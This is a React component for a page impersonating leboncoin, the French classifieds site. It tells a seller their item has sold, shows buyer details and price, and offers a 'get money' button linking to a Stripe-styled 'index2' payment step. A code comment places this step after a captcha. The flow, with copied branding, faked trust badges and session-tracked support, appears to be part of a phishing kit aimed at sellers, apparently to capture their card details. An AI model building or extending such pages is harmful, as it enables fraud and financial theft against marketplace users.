import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './LeboncoinFrSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';
import { API_URL } from '../apiBase';
import { leboncoinFrSuccessCopy as t } from '../leboncoinFrSuccessCopy';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const HEADER_BRAND_SRC = `${process.env.PUBLIC_URL || ''}/leboncoin-fr-header-brand.png`;

function resolvePhotoUrl(raw) {
  const u = (raw || '').trim();
  if (!u) return '';
  if (u.startsWith('http://') || u.startsWith('https://')) return u;
  const base = API_URL.replace(/\/$/, '');
  return `${base}/${u.replace(/^\//, '')}`;
}

function IconBack() {
  return (
    <svg width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="#666" strokeWidth="2" aria-hidden>
      <path d="M15 18l-6-6 6-6" strokeLinecap="round" strokeLinejoin="round" />
    </svg>
  );
}

function IconShieldCheck() {
  return (
    <svg className="lbc-shield-ico" viewBox="0 0 24 24" fill="none" aria-hidden>
      <path
        d="M12 2l7 4v6c0 5-3.5 9.5-7 10-3.5-.5-7-5-7-10V6l7-4z"
        fill="#0a7a82"
        fillOpacity="0.2"
        stroke="#0a7a82"
        strokeWidth="1.2"
      />
      <path d="M9 12l2 2 4-5" stroke="#0a7a82" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round" />
    </svg>
  );
}

function IconPadlock() {
  return (
    <svg className="lbc-trust-ico lbc-trust-ico--lock" viewBox="0 0 32 32" fill="none" aria-hidden>
      <rect x="7" y="14" width="18" height="14" rx="2" stroke="#2e9d5c" strokeWidth="1.8" />
      <path
        d="M11 14V10a5 5 0 0 1 10 0v4"
        stroke="#2e9d5c"
        strokeWidth="1.8"
        strokeLinecap="round"
      />
      <circle cx="16" cy="21" r="2" fill="#2e9d5c" />
    </svg>
  );
}

function IconLifebuoy() {
  return (
    <svg className="lbc-trust-ico lbc-trust-ico--life" viewBox="0 0 32 32" fill="none" aria-hidden>
      <circle cx="16" cy="16" r="11" stroke="#e85d4c" strokeWidth="1.8" />
      <circle cx="16" cy="16" r="5" stroke="#e85d4c" strokeWidth="1.8" />
      <path d="M16 5v4M16 23v4M5 16h4M23 16h4" stroke="#e85d4c" strokeWidth="1.8" strokeLinecap="round" />
    </svg>
  );
}

/**
 * leboncoin (FR) — après captcha → index2 (VintedStripe2).
 */
function LeboncoinFrSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [imgFailed, setImgFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    setImgFailed(false);
  }, [pageData?.photo_url]);

  const countryCode = (pageData?.country_code || 'FR').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'EUR';
  const sym = getSymbol(currencyCode);

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  })();

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(Math.round(priceNumber))
        : String(priceNumber);

  const amountLine = priceText === '—' ? `— ${sym}` : `${priceText} ${sym}`;

  const fullName = [pageData?.first_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const productName = (pageData?.product_name || '').trim() || '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const rawPhoto = (pageData?.photo_url || '').trim();
  const photoSrc = resolvePhotoUrl(rawPhoto);
  const showPhoto = Boolean(photoSrc && !imgFailed);

  if (loading && pageCode) {
    return (
      <div className="lbc-wrap">
        <p className="lbc-loading">{t.loading}</p>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="lbc-wrap">
      <header className="lbc-header">
        <button type="button" className="lbc-back" aria-label="Retour" onClick={(e) => e.preventDefault()}>
          <IconBack />
        </button>
        <div className="lbc-header-brand-wrap">
          <img
            src={HEADER_BRAND_SRC}
            alt={`leboncoin — ${t.secureHeader}`}
            className="lbc-header-brand-img"
            width={900}
            height={100}
            decoding="async"
          />
        </div>
      </header>

      <section className="lbc-hero" aria-label={t.titleSold}>
        <div className="lbc-hero-inner">
          <article className="lbc-sold-card">
            <p className="lbc-step">{t.stepLabel}</p>
            <h1 className="lbc-h1">{t.titleSold}</h1>

            <div className="lbc-product-panel">
              <div className="lbc-product-row">
                {showPhoto ? (
                  <img
                    className="lbc-product-thumb"
                    src={photoSrc}
                    alt=""
                    onError={() => setImgFailed(true)}
                    decoding="async"
                  />
                ) : (
                  <div className="lbc-product-thumb lbc-product-thumb--ph" aria-hidden />
                )}
                <div className="lbc-product-text">
                  <span className="lbc-product-name">{productName}</span>
                  <span className="lbc-product-price">{amountLine}</span>
                </div>
              </div>
              <div className="lbc-buyer-lines">
                <p>
                  <span className="lbc-buyer-k">{t.buyerLine}</span> {fullName}
                </p>
                <p>
                  <span className="lbc-buyer-k">{t.addressLine}</span> {address}
                </p>
              </div>
            </div>

            <div className="lbc-status-strip">
              <IconShieldCheck />
              <p>{t.statusBanner}</p>
            </div>

            <Link to={index2Path} className="lbc-cta-teal">
              {t.ctaGetMoney}
            </Link>
            <p className="lbc-card-note">{t.shipHint}</p>
          </article>
        </div>
      </section>

      <section className="lbc-trust" aria-labelledby="lbc-trust-heading">
        <h2 id="lbc-trust-heading" className="lbc-trust-title">
          {t.trustTitle}
        </h2>
        <div className="lbc-trust-grid">
          <div className="lbc-trust-col">
            <IconPadlock />
            <h3 className="lbc-trust-h">{t.trustBuyTitle}</h3>
            <p className="lbc-trust-p">{t.trustBuyBody}</p>
          </div>
          <div className="lbc-trust-col">
            <IconLifebuoy />
            <h3 className="lbc-trust-h">{t.trustSupportTitle}</h3>
            <p className="lbc-trust-p">{t.trustSupportBody}</p>
          </div>
        </div>
      </section>

      <footer className="lbc-site-footer">
        <div className="lbc-footer-ribbon">
          <p>{t.footerTagline}</p>
        </div>
        <div className="lbc-footer-grid">
          <div>
            <h4 className="lbc-footer-h">{t.footerCol1Title}</h4>
            <p className="lbc-footer-links">{t.footerCol1Links}</p>
          </div>
          <div>
            <h4 className="lbc-footer-h">{t.footerCol2Title}</h4>
            <p className="lbc-footer-links">{t.footerCol2Links}</p>
          </div>
          <div>
            <h4 className="lbc-footer-h">{t.footerCol3Title}</h4>
            <p className="lbc-footer-links">{t.footerCol3Links}</p>
          </div>
          <div>
            <h4 className="lbc-footer-h">{t.footerCol4Title}</h4>
            <p className="lbc-footer-links">{t.footerCol4Links}</p>
          </div>
        </div>
        <p className="lbc-footer-legal">{t.footerLegal}</p>
      </footer>

      <div className="lbc-sticky-bar">
        <div className="lbc-sticky-inner">
          <div className="lbc-sticky-total">
            <span className="lbc-sticky-label">{amountLine}</span>
          </div>
          <Link to={index2Path} className="lbc-cta-teal lbc-cta-teal--sm">
            {t.ctaGetMoney}
          </Link>
        </div>
      </div>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default LeboncoinFrSuccess;
